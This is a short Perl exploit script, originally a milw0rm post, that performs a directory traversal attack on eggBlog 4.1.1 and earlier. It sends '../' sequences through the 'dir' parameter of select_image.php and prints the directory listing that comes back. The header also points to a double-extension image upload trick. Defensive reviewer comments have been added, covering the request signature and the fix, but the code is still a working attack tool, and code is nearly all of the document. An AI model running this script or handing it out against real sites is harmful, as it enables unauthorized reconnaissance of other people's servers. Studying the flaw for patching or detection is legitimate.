1 #!/usr/bin/perl
2 #
3 # eggBlog <= 4.1.1 Local Directory Transversal Exploit
4 #
5 # by Juri Gianni aka yeat − staker[at]hotmail[dot]it
6 # Visit http://zeroidentity.org
7 #
8 # Description
9 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
10 # eggBlog contains a flaw that allows an attacker to
11 # carry out a local directory traversal attack.
12 # The issue is due to the 'select_image.php' script not
13 # properly sanitizing user input supplied in the 'dir'
14 # GET variable.
15 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
16 # Note: you may upload image files with double ext on
17 # _lib/openwysiwyg/addons/imagelibrary/insert_image.php
18 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
19
20 use LWP::UserAgent;
21
22
# Positional arguments: the target host/path and the value that is sent as
# the 'dir' query parameter. $domain stays a file-scoped lexical because
# exploit() reads it directly instead of taking it as an argument.
my ($domain, $folder) = @ARGV;

# The second argument is mandatory; without it, print the banner and exit.
usage() unless $folder;

exploit($folder);
27
28
sub usage()
{
    # Print the banner and the expected argument order, then terminate the
    # script. Never returns to the caller.
    print join("\n",
        "eggBlog <= 4.1.1 Local Directory Transversal Exploit",
        "Usage: perl xpl.pl localhost/eggBlog ../../",
        "Visit http://zeroidentity.org",
    ), "\n";
    exit;
}
36
37
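# Sends one GET request to select_image.php with the caller-supplied value
# in the 'dir' query parameter and prints every string the response wraps
# in <strong>...</strong>, one per line.
#
# Parameters:
#   $param - value placed verbatim (no URL encoding) in the 'dir' parameter.
# Reads the file-scoped $domain for the host and base path.
# Dies if no parameter is given; warns and returns if the request fails.
#
# Reviewer notes (defensive):
#   - Server-side this appears as a GET for
#     _lib/openwysiwyg/addons/imagelibrary/select_image.php whose 'dir'
#     value contains '../' segments. The User-Agent set below is
#     client-controlled, so it is a weak indicator on its own.
#   - The fix belongs in select_image.php: resolve 'dir' to a canonical
#     path and refuse anything outside the image library root.
#
# The empty prototype of the original declaration was dropped: the sub
# takes one argument, and '()' would reject any call compiled after the
# definition.
sub exploit
{
    my ($param) = @_;
    die "1 parameter required\n" unless $param;

    # Direct method call instead of indirect object syntax.
    my $lib = LWP::UserAgent->new;
    $lib->agent('Lynx (textmode)');
    $lib->timeout(5);

    my $response = $lib->get("http://$domain/_lib/openwysiwyg/addons/imagelibrary/select_image.php?dir=$param");

    # An error page may itself contain <strong> tags; do not parse it as if
    # it were a directory listing.
    unless ($response->is_success) {
        warn "request failed: " . $response->status_line . "\n";
        return;
    }

    # List-context match collects every captured entry name.
    my @director = $response->content =~ /<strong>(.+?)<\/strong>/ig;

    # The original loop ran to $i <= scalar(@director), one element past the
    # end, and printed an undefined value as a trailing blank line.
    print "$_\n" for @director;

    return;
}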
58
59 # milw0rm.com [2009−05−11]